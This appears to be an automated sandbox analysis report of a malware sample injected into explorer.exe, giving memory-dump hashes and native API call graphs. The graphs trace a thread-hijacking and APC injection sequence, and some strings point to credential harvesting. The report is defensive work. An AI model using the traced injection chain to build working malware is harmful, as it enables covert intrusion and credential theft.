                                                                                                                      • Source File: 00000004.00000002.2641089274.000000000E720000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E720000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_e720000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: .$l$l$t
                                                                                                                      • API String ID: 0-168566397
                                                                                                                      • Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                                                                                                      • Instruction ID: 682e127468e34b60bbcccdbe801baf35b741921cb06f5b33ab415541f1ca81e9
                                                                                                                      • Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                                                                                                      • Instruction Fuzzy Hash: 2F218D70A24A0D9FDB48EFB8D4487EDBBF1FB18300F604A2ED009E3611DB7899558B94
                                                                                                                      Function 0E736FF2 Relevance: 5.1, Strings: 4, Instructions: 77COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2641089274.000000000E720000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E720000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_e720000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: auth$logi$pass$user
                                                                                                                      • API String ID: 0-2393853802
                                                                                                                      • Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                                                                                                      • Instruction ID: 7d285e26d09b43b735ad51fca5ced63a49f9425dd6f436c71cd03a79ebc649e3
                                                                                                                      • Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                                                                                                      • Instruction Fuzzy Hash: 7C21F071614B0C8BCB45DFA998947EEB7E1EFC8310F00461AD40AEB219D7B0ED008BC2

                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:1.8%
                                                                                                                      Dynamic/Decrypted Code Coverage:10.4%
                                                                                                                      Signature Coverage:0%
                                                                                                                      Total number of Nodes:404
                                                                                                                      Total number of Limit Nodes:57
                                                                                                                      execution_graph 102160 4c22ad0 LdrInitializeThunk 102164 2969040 102169 296bd00 102164->102169 102166 296915c 102167 29690e0 Sleep 102168 296907b 102167->102168 102168->102166 102168->102167 102172 296a500 102169->102172 102171 296bd2d 102171->102168 102173 296a51c NtAllocateVirtualMemory 102172->102173 102175 296af20 102172->102175 102173->102171 102176 296af30 102175->102176 102176->102173 102177 296f09d 102180 296b990 102177->102180 102179 296f0a2 102181 296b9b6 102180->102181 102186 2959d30 102181->102186 102183 296b9c2 102184 296b9e6 102183->102184 102192 2958f30 102183->102192 102184->102179 102222 2959c80 102186->102222 102188 2959d44 102188->102183 102189 2959d3d 102189->102188 102229 295f170 102189->102229 102196 2958f57 102192->102196 102194 2958ffc 102476 295f400 102194->102476 102218 29590f2 102196->102218 102466 295f370 102196->102466 102197 2959006 102198 296bf50 RtlAllocateHeap 102197->102198 102197->102218 102199 295902a 102198->102199 102200 296bf50 RtlAllocateHeap 102199->102200 102201 295903b 102200->102201 102202 296bf50 RtlAllocateHeap 102201->102202 102203 295904c 102202->102203 102486 295ca80 102203->102486 102205 2959059 102206 2964a40 7 API calls 102205->102206 102207 2959066 102206->102207 102208 2964a40 7 API calls 102207->102208 102209 2959077 102208->102209 102210 29590a5 102209->102210 102211 2959084 102209->102211 102212 2964a40 7 API calls 102210->102212 102492 295d610 102211->102492 102214 29590c1 102212->102214 102221 29590e9 102214->102221 102513 295d6b0 NtClose LdrInitializeThunk LdrInitializeThunk 102214->102513 102215 295908b 102496 2958d00 102215->102496 102216 2958d00 22 API calls 102216->102218 102218->102184 102221->102216 102224 2959c93 102222->102224 102223 2959ca6 102223->102189 102224->102223 102237 296b270 102224->102237 102226 2959ce3 102226->102223 102248 2959aa0 102226->102248 102228 2959d03 102228->102189 102230 295f189 102229->102230 102231 2959d55 102230->102231 102458 296a790 102230->102458 102231->102183 102233 295f1c2 102236 295f1ed 102233->102236 102461 296a220 102233->102461 102235 296a450 NtClose 102235->102231 102236->102235 102238 296b289 102237->102238 102254 2964a40 102238->102254 102240 296b2a1 102241 296b2aa 102240->102241 102283 296b0b0 102240->102283 102241->102226 102243 296b2be 102243->102241 102297 2969ec0 102243->102297 102437 2957ea0 102248->102437 102250 2959ac1 102250->102228 102251 2959aba 102251->102250 102450 2958160 102251->102450 102255 2964a54 102254->102255 102256 2964b63 102254->102256 102255->102256 102304 296a320 102255->102304 102256->102240 102258 2964ba7 102259 296bd80 RtlFreeHeap 102258->102259 102263 2964bb3 102259->102263 102260 2964d39 102262 296a450 NtClose 102260->102262 102261 2964d4f 102353 2964780 NtReadFile NtClose 102261->102353 102264 2964d40 102262->102264 102263->102256 102263->102260 102263->102261 102267 2964c42 102263->102267 102264->102240 102266 2964d62 102266->102240 102268 2964ca9 102267->102268 102269 2964c51 102267->102269 102268->102260 102275 2964cbc 102268->102275 102270 2964c56 102269->102270 102271 2964c6a 102269->102271 102349 2964640 NtClose LdrInitializeThunk LdrInitializeThunk 102270->102349 102273 2964c87 102271->102273 102274 2964c6f 102271->102274 102273->102264 102317 2964400 102273->102317 102307 29646e0 102274->102307 102350 296a450 102275->102350 102276 2964c60 102276->102240 102278 2964c7d 102278->102240 102281 2964c9f 102281->102240 102282 2964d28 102282->102240 102284 296b0c1 102283->102284 102285 296b0d3 102284->102285 102286 296bd00 NtAllocateVirtualMemory 102284->102286 102285->102243 102287 296b0f4 102286->102287 102369 2964060 102287->102369 102289 296b140 102289->102243 102290 296b117 102290->102289 102291 2964060 2 API calls 102290->102291 102293 296b139 102291->102293 102293->102289 102401 2965380 102293->102401 102294 296b1ca 102411 2969e80 102294->102411 102298 2969edc 102297->102298 102431 4c22c0a 102298->102431 102299 2969ef7 102301 296bd80 102299->102301 102434 296a630 102301->102434 102303 296b319 102303->102226 102305 296af20 102304->102305 102306 296a33c NtCreateFile 102305->102306 102306->102258 102308 29646fc 102307->102308 102309 2964724 102308->102309 102310 2964738 102308->102310 102312 296a450 NtClose 102309->102312 102311 296a450 NtClose 102310->102311 102314 2964741 102311->102314 102313 296472d 102312->102313 102313->102278 102354 296bf90 RtlAllocateHeap 102314->102354 102316 296474c 102316->102278 102318 296447e 102317->102318 102319 296444b 102317->102319 102321 296449a 102318->102321 102323 29645c9 102318->102323 102320 296a450 NtClose 102319->102320 102322 296446f 102320->102322 102324 29644d1 102321->102324 102325 29644bc 102321->102325 102322->102281 102329 296a450 NtClose 102323->102329 102327 29644d6 102324->102327 102328 29644ec 102324->102328 102326 296a450 NtClose 102325->102326 102330 29644c5 102326->102330 102331 296a450 NtClose 102327->102331 102337 29644f1 102328->102337 102355 296bf50 102328->102355 102332 2964629 102329->102332 102330->102281 102333 29644df 102331->102333 102332->102281 102333->102281 102336 2964557 102338 2964575 102336->102338 102339 296458a 102336->102339 102342 2964503 102337->102342 102358 296a3d0 102337->102358 102340 296a450 NtClose 102338->102340 102341 296a450 NtClose 102339->102341 102340->102342 102343 2964593 102341->102343 102342->102281 102344 29645bf 102343->102344 102361 296bb50 102343->102361 102344->102281 102346 29645aa 102347 296bd80 RtlFreeHeap 102346->102347 102348 29645b3 102347->102348 102348->102281 102349->102276 102351 296af20 102350->102351 102352 296a46c NtClose 102351->102352 102352->102282 102353->102266 102354->102316 102366 296a5f0 102355->102366 102357 296bf68 102357->102337 102359 296af20 102358->102359 102360 296a3ec NtReadFile 102359->102360 102360->102336 102362 296bb74 102361->102362 102363 296bb5d 102361->102363 102362->102346 102363->102362 102364 296bf50 RtlAllocateHeap 102363->102364 102365 296bb8b 102364->102365 102365->102346 102367 296af20 102366->102367 102368 296a60c RtlAllocateHeap 102367->102368 102368->102357 102370 2964071 102369->102370 102372 2964079 102369->102372 102370->102290 102371 296434c 102371->102290 102372->102371 102415 296cef0 102372->102415 102374 29640cd 102375 296cef0 RtlAllocateHeap 102374->102375 102379 29640d8 102375->102379 102376 2964126 102378 296cef0 RtlAllocateHeap 102376->102378 102382 296413a 102378->102382 102379->102376 102423 296cf90 RtlAllocateHeap RtlFreeHeap 102379->102423 102424 296d020 102379->102424 102381 2964197 102383 296cef0 RtlAllocateHeap 102381->102383 102382->102381 102385 296d020 2 API calls 102382->102385 102384 29641ad 102383->102384 102386 29641ea 102384->102386 102388 296d020 2 API calls 102384->102388 102385->102382 102387 296cef0 RtlAllocateHeap 102386->102387 102389 29641f5 102387->102389 102388->102384 102390 296d020 2 API calls 102389->102390 102397 296422f 102389->102397 102390->102389 102393 296cf50 RtlFreeHeap 102394 296432e 102393->102394 102395 296cf50 RtlFreeHeap 102394->102395 102396 2964338 102395->102396 102398 296cf50 RtlFreeHeap 102396->102398 102420 296cf50 102397->102420 102399 2964342 102398->102399 102400 296cf50 RtlFreeHeap 102399->102400 102400->102371 102402 2965391 102401->102402 102403 2964a40 7 API calls 102402->102403 102405 29653a7 102403->102405 102404 29653fa 102404->102294 102405->102404 102406 29653f5 102405->102406 102407 29653e2 102405->102407 102409 296bd80 RtlFreeHeap 102406->102409 102408 296bd80 RtlFreeHeap 102407->102408 102410 29653e7 102408->102410 102409->102404 102410->102294 102412 2969e9c 102411->102412 102430 4c22df0 LdrInitializeThunk 102412->102430 102413 2969eb3 102413->102243 102416 296cf06 102415->102416 102417 296cf00 102415->102417 102418 296bf50 RtlAllocateHeap 102416->102418 102417->102374 102419 296cf2c 102418->102419 102419->102374 102421 296bd80 RtlFreeHeap 102420->102421 102422 2964324 102421->102422 102422->102393 102423->102379 102425 296cf90 102424->102425 102426 296cfed 102425->102426 102427 296bf50 RtlAllocateHeap 102425->102427 102426->102379 102428 296cfca 102427->102428 102429 296bd80 RtlFreeHeap 102428->102429 102429->102426 102430->102413 102432 4c22c11 102431->102432 102433 4c22c1f LdrInitializeThunk 102431->102433 102432->102299 102433->102299 102435 296af20 102434->102435 102436 296a64c RtlFreeHeap 102435->102436 102436->102303 102438 2957eb0 102437->102438 102439 2957eab 102437->102439 102440 296bd00 NtAllocateVirtualMemory 102438->102440 102439->102251 102447 2957ed5 102440->102447 102441 2957f38 102441->102251 102442 2969e80 LdrInitializeThunk 102442->102447 102443 2957f3e 102444 2957f64 102443->102444 102446 296a580 LdrInitializeThunk 102443->102446 102444->102251 102449 2957f55 102446->102449 102447->102441 102447->102442 102447->102443 102448 296bd00 NtAllocateVirtualMemory 102447->102448 102453 296a580 102447->102453 102448->102447 102449->102251 102451 296a580 LdrInitializeThunk 102450->102451 102452 295817e 102451->102452 102452->102228 102454 296a59c 102453->102454 102457 4c22c70 LdrInitializeThunk 102454->102457 102455 296a5b3 102455->102447 102457->102455 102459 296af20 102458->102459 102460 296a7af LookupPrivilegeValueW 102459->102460 102460->102233 102462 296a23c 102461->102462 102465 4c22ea0 LdrInitializeThunk 102462->102465 102463 296a25b 102463->102236 102465->102463 102467 295f39c 102466->102467 102514 295f280 102467->102514 102470 295f3e1 102473 295f3f2 102470->102473 102475 296a450 NtClose 102470->102475 102471 295f3c9 102472 295f3d4 102471->102472 102474 296a450 NtClose 102471->102474 102472->102194 102473->102194 102474->102472 102475->102473 102477 295f42c 102476->102477 102478 295f280 2 API calls 102477->102478 102479 295f44f 102478->102479 102480 295f471 102479->102480 102481 295f459 102479->102481 102482 295f482 102480->102482 102485 296a450 NtClose 102480->102485 102483 295f464 102481->102483 102484 296a450 NtClose 102481->102484 102482->102197 102483->102197 102484->102483 102485->102482 102487 295ca96 102486->102487 102489 295caa0 102486->102489 102487->102205 102488 295cb64 102488->102205 102489->102488 102490 2964a40 7 API calls 102489->102490 102491 295cbd5 102490->102491 102491->102205 102493 295d636 102492->102493 102525 295d300 102493->102525 102495 295d69c 102495->102215 102499 2958d14 102496->102499 102550 295f6c0 102496->102550 102498 2958f25 102498->102184 102499->102498 102554 2964390 102499->102554 102501 2958d70 102501->102498 102557 2958ab0 102501->102557 102504 296cef0 RtlAllocateHeap 102505 2958db2 102504->102505 102506 296d020 2 API calls 102505->102506 102510 2958dc7 102506->102510 102507 2957ea0 3 API calls 102507->102510 102510->102498 102510->102507 102511 295c7a0 17 API calls 102510->102511 102512 2958160 LdrInitializeThunk 102510->102512 102562 295f660 102510->102562 102566 295f070 20 API calls 102510->102566 102511->102510 102512->102510 102513->102221 102515 295f350 102514->102515 102516 295f29a 102514->102516 102515->102470 102515->102471 102520 2969f40 102516->102520 102519 296a450 NtClose 102519->102515 102521 2969f5c 102520->102521 102524 4c235c0 LdrInitializeThunk 102521->102524 102522 295f344 102522->102519 102524->102522 102526 295d317 102525->102526 102531 295f700 102526->102531 102530 295d38b 102530->102495 102532 295f725 102531->102532 102542 29581a0 102532->102542 102534 295d35f 102539 296a6a0 102534->102539 102535 2964a40 7 API calls 102537 295f749 102535->102537 102537->102534 102537->102535 102538 296bd80 RtlFreeHeap 102537->102538 102549 295f540 CreateProcessInternalW LdrInitializeThunk 102537->102549 102538->102537 102540 296af20 102539->102540 102541 296a6bf CreateProcessInternalW 102540->102541 102541->102530 102543 295829f 102542->102543 102544 29581b5 102542->102544 102543->102537 102544->102543 102545 2964a40 7 API calls 102544->102545 102546 2958222 102545->102546 102547 296bd80 RtlFreeHeap 102546->102547 102548 2958249 102546->102548 102547->102548 102548->102537 102549->102537 102551 295f6df 102550->102551 102552 295f6e6 SetErrorMode 102551->102552 102553 295f6ed 102551->102553 102552->102553 102553->102499 102567 295f490 102554->102567 102556 29643b6 102556->102501 102558 296bd00 NtAllocateVirtualMemory 102557->102558 102561 2958ad5 102558->102561 102559 2958cea 102559->102504 102561->102559 102584 2969840 102561->102584 102563 295f673 102562->102563 102619 2969e50 102563->102619 102566->102510 102568 295f4ad 102567->102568 102574 2969f80 102568->102574 102571 295f4f5 102571->102556 102575 2969f9c 102574->102575 102582 4c22f30 LdrInitializeThunk 102575->102582 102576 295f4ee 102576->102571 102578 2969fd0 102576->102578 102579 2969fec 102578->102579 102583 4c22d10 LdrInitializeThunk 102579->102583 102580 295f51e 102580->102556 102582->102576 102583->102580 102585 296bf50 RtlAllocateHeap 102584->102585 102586 2969857 102585->102586 102603 2959310 102586->102603 102588 2969872 102589 29698b0 102588->102589 102590 2969899 102588->102590 102592 296bd00 NtAllocateVirtualMemory 102589->102592 102591 296bd80 RtlFreeHeap 102590->102591 102593 29698a6 102591->102593 102594 29698ea 102592->102594 102593->102559 102595 296bd00 NtAllocateVirtualMemory 102594->102595 102596 2969903 102595->102596 102597 2969b90 102596->102597 102600 2969ba4 102596->102600 102598 296bd80 RtlFreeHeap 102597->102598 102599 2969b9a 102598->102599 102599->102559 102601 296bd80 RtlFreeHeap 102600->102601 102602 2969bf9 102601->102602 102602->102559 102604 2959335 102603->102604 102606 295938d 102604->102606 102607 295cf10 102604->102607 102606->102588 102608 295cf3c 102607->102608 102609 295cf5c 102608->102609 102614 296a1e0 102608->102614 102609->102606 102611 295cf7f 102611->102609 102612 296a450 NtClose 102611->102612 102613 295cfba 102612->102613 102613->102606 102615 296a1fc 102614->102615 102618 4c22ca0 LdrInitializeThunk 102615->102618 102616 296a217 102616->102611 102618->102616 102620 2969e6c 102619->102620 102623 4c22dd0 LdrInitializeThunk 102620->102623 102621 295f69e 102621->102510 102623->102621 102624 4aacb84 102627 4aaa042 102624->102627 102626 4aacba5 102628 4aaa06b 102627->102628 102629 4aaa182 NtQueryInformationProcess 102628->102629 102644 4aaa56c 102628->102644 102631 4aaa1ba 102629->102631 102630 4aaa1ef 102630->102626 102631->102630 102632 4aaa2db 102631->102632 102633 4aaa290 102631->102633 102634 4aaa2fc NtSuspendThread 102632->102634 102656 4aa9de2 NtCreateSection NtMapViewOfSection NtClose 102633->102656 102636 4aaa30d 102634->102636 102638 4aaa331 102634->102638 102636->102626 102637 4aaa2cf 102637->102626 102640 4aaa412 102638->102640 102647 4aa9bb2 102638->102647 102641 4aaa531 102640->102641 102642 4aaa4a6 NtSetContextThread 102640->102642 102643 4aaa552 NtResumeThread 102641->102643 102646 4aaa4bd 102642->102646 102643->102644 102644->102626 102645 4aaa51c NtQueueApcThread 102645->102641 102646->102641 102646->102645 102648 4aa9bf7 102647->102648 102649 4aa9c66 NtCreateSection 102648->102649 102650 4aa9d4e 102649->102650 102651 4aa9ca0 102649->102651 102650->102640 102652 4aa9cc1 NtMapViewOfSection 102651->102652 102652->102650 102653 4aa9d0c 102652->102653 102653->102650 102654 4aa9d88 102653->102654 102655 4aa9dc5 NtClose 102654->102655 102655->102640 102656->102637

                                                                                                                      Executed Functions

                                                                                                                      Function 04AAA036 Relevance: 11.0, APIs: 5, Strings: 1, Instructions: 481nativeCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • NtQueryInformationProcess.NTDLL ref: 04AAA19F
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.4160449305.0000000004AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_4aa0000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InformationProcessQuery
                                                                                                                      • String ID: 0
                                                                                                                      • API String ID: 1778838933-4108050209
                                                                                                                      • Opcode ID: 7bc916a415ef614ffafa7f75d0ec115445e44d1b24a8fe03bb76e065ae57333e
                                                                                                                      • Instruction ID: a0be38c689833dd56a640d7450e88dd8fb8e897e92837c1c8e5e805d182e77e5
                                                                                                                      • Opcode Fuzzy Hash: 7bc916a415ef614ffafa7f75d0ec115445e44d1b24a8fe03bb76e065ae57333e
                                                                                                                      • Instruction Fuzzy Hash: 88F14174918A4C8FDBA5EF68C894AEEB7E1FF98304F40462AD44ED7650DF34A541CB41
                                                                                                                      Function 04AA9BAF Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 227nativeCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 207 4aa9baf-4aa9bfe call 4aa9102 210 4aa9c0c-4aa9c9a call 4aab942 * 2 NtCreateSection 207->210 211 4aa9c00 207->211 217 4aa9d5a-4aa9d68 210->217 218 4aa9ca0-4aa9d0a call 4aab942 NtMapViewOfSection 210->218 212 4aa9c02-4aa9c0a 211->212 212->210 212->212 221 4aa9d0c-4aa9d4c 218->221 222 4aa9d52 218->222 224 4aa9d69-4aa9d6b 221->224 225 4aa9d4e-4aa9d4f 221->225 222->217 226 4aa9d88-4aa9ddc call 4aacd62 NtClose 224->226 227 4aa9d6d-4aa9d72 224->227 225->222 228 4aa9d74-4aa9d86 call 4aa9172 227->228 228->226
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.4160449305.0000000004AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_4aa0000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Section$CloseCreateView
                                                                                                                      • String ID: @$@
                                                                                                                      • API String ID: 1133238012-149943524
                                                                                                                      • Opcode ID: db7dcd85dc853400a789dde9de35cb8114d6383d98fd4a16120e7ccab82aa783
                                                                                                                      • Instruction ID: a4bcfed2a5fb6194d65dedbd05ef57218ba2b3571b9f696e28f9da53d99f376b
                                                                                                                      • Opcode Fuzzy Hash: db7dcd85dc853400a789dde9de35cb8114d6383d98fd4a16120e7ccab82aa783
                                                                                                                      • Instruction Fuzzy Hash: 7261837051CB488FDB58EF68D8856AABBE0FF98314F50062EE58AC3651DF35E441CB86
                                                                                                                      Function 04AA9BB2 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 171nativeCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 266 4aa9bb2-4aa9bef 267 4aa9bf7-4aa9bfe 266->267 268 4aa9bf2 call 4aa9102 266->268 269 4aa9c0c-4aa9c9a call 4aab942 * 2 NtCreateSection 267->269 270 4aa9c00 267->270 268->267 276 4aa9d5a-4aa9d68 269->276 277 4aa9ca0-4aa9d0a call 4aab942 NtMapViewOfSection 269->277 271 4aa9c02-4aa9c0a 270->271 271->269 271->271 280 4aa9d0c-4aa9d4c 277->280 281 4aa9d52 277->281 283 4aa9d69-4aa9d6b 280->283 284 4aa9d4e-4aa9d4f 280->284 281->276 285 4aa9d88-4aa9ddc call 4aacd62 NtClose 283->285 286 4aa9d6d-4aa9d72 283->286 284->281 287 4aa9d74-4aa9d86 call 4aa9172 286->287 287->285
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.4160449305.0000000004AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_4aa0000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Section$CreateView
                                                                                                                      • String ID: @$@
                                                                                                                      • API String ID: 1585966358-149943524
                                                                                                                      • Opcode ID: d19581801156352ea8c1368f03ac477e7143ca4b49b2be0ea58d8e64d299f740
                                                                                                                      • Instruction ID: e9bafb42bba6fa698b6afe82cef2db691d15d3d66e465da696ba39206cf905a8
                                                                                                                      • Opcode Fuzzy Hash: d19581801156352ea8c1368f03ac477e7143ca4b49b2be0ea58d8e64d299f740
                                                                                                                      • Instruction Fuzzy Hash: 4B5170B0618B088FD758DF18D8956AABBE4FF88314F50062EE58EC3651DF35E481CB86
                                                                                                                      Function 04AAA042 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 163nativeCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • NtQueryInformationProcess.NTDLL ref: 04AAA19F
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.4160449305.0000000004AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_4aa0000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InformationProcessQuery
                                                                                                                      • String ID: 0
                                                                                                                      • API String ID: 1778838933-4108050209
                                                                                                                      • Opcode ID: 4a13b2017a61ababd9bba988d9a9b5b8b8f576b3da72e298de5122239bed11ad
                                                                                                                      • Instruction ID: 48e040c524d90cd8ad422171408513dd93390ca8bf5bbbae982aa27e9e6d1187
                                                                                                                      • Opcode Fuzzy Hash: 4a13b2017a61ababd9bba988d9a9b5b8b8f576b3da72e298de5122239bed11ad
                                                                                                                      • Instruction Fuzzy Hash: 14512E70914A8C8FEBA9EF68C8946EEB7F4FB98305F40462ED44AD7250DF309645CB41
                                                                                                                      Function 0296A320 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 565 296a320-296a371 call 296af20 NtCreateFile
                                                                                                                      APIs
                                                                                                                      • NtCreateFile.NTDLL(00000060,00000000,.z`,02964BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02964BA7,007A002E,00000000,00000060,00000000,00000000), ref: 0296A36D
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.4158012154.0000000002950000.00000040.80000000.00040000.00000000.sdmp, Offset: 02950000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_2950000_explorer.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateFile
                                                                                                                      • String ID: .z`
                                                                                                                      • API String ID: 823142352-1441809116
                                                                                                                      • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                                      • Instruction ID: 5723c9e5332e6627e891934dded7fd402faa2be69655ec4e134fa3c352e65f47
                                                                                                                      • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                                      • Instruction Fuzzy Hash: F8F0B2B2200208AFCB08CF88DC94EEB77EDAF8C754F158248BA0D97240C630E8118BA4
                                                                                                                      Function 0296A3D0 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • NtReadFile.NTDLL(02964D62,5EB65239,FFFFFFFF,02964A21,?,?,02964D62,?,02964A21,FFFFFFFF,5EB65239,02964D62,?,00000000), ref: 0296A415
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.4158012154.0000000002950000.00000040.80000000.00040000.00000000.sdmp, Offset: 02950000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_2950000_explorer.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FileRead
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2738559852-0
                                                                                                                      • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                                                      • Instruction ID: a99d09a9d41fc1d4f9c9e8c730a7df0e965b5723ac510e51430ef67a693cb6b4
                                                                                                                      • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                                                      • Instruction Fuzzy Hash: AFF0A4B2200208AFCB14DF89DC94EEB77ADAF8C754F158258BA1DA7241D630E8118BA0
                                                                                                                      Function 0296A500 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02952D11,00002000,00003000,00000004), ref: 0296A539
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.4158012154.0000000002950000.00000040.80000000.00040000.00000000.sdmp, Offset: 02950000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_2950000_explorer.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocateMemoryVirtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2167126740-0
                                                                                                                      • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                                                      • Instruction ID: 9c679a19cd3e6646642d52bc9acd5b85b39c56eb3bfe594bb59ac0127874600f
                                                                                                                      • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                                                      • Instruction Fuzzy Hash: 8FF015B2200208AFCB14DF89DC80EAB77ADAF88754F118158BE08A7241C630F810CBA0
                                                                                                                      Function 0296A4FB Relevance: 1.5, APIs: 1, Instructions: 29memorynativeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02952D11,00002000,00003000,00000004), ref: 0296A539
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.4158012154.0000000002950000.00000040.80000000.00040000.00000000.sdmp, Offset: 02950000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_2950000_explorer.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocateMemoryVirtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2167126740-0
                                                                                                                      • Opcode ID: 4e0d8033807141b7815a619b56b0a309f13dcba26b20c43bcee8e4998eb50e7a
                                                                                                                      • Instruction ID: 488e37ce243f0b36aaa267bc104b41fb1166a0273ac7528304a17aa783edba8f
                                                                                                                      • Opcode Fuzzy Hash: 4e0d8033807141b7815a619b56b0a309f13dcba26b20c43bcee8e4998eb50e7a
                                                                                                                      • Instruction Fuzzy Hash: 36F030B62001496BCB15DF98DC84CA777A9BF88214B15865DFD489B202C634D815CBA0
                                                                                                                      Function 0296A44B Relevance: 1.5, APIs: 1, Instructions: 21nativeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • NtClose.NTDLL(02964D40,?,?,02964D40,00000000,FFFFFFFF), ref: 0296A475
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.4158012154.0000000002950000.00000040.80000000.00040000.00000000.sdmp, Offset: 02950000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_2950000_explorer.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Close
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3535843008-0
                                                                                                                      • Opcode ID: 072bdcd647c6d36830f8f6c12112151eb3ad9b3d11557e58530cd4f796fef379
                                                                                                                      • Instruction ID: 7905ad398db8824259c1c6612c5bf191536739aca82fd2e80e03b620c56ce229
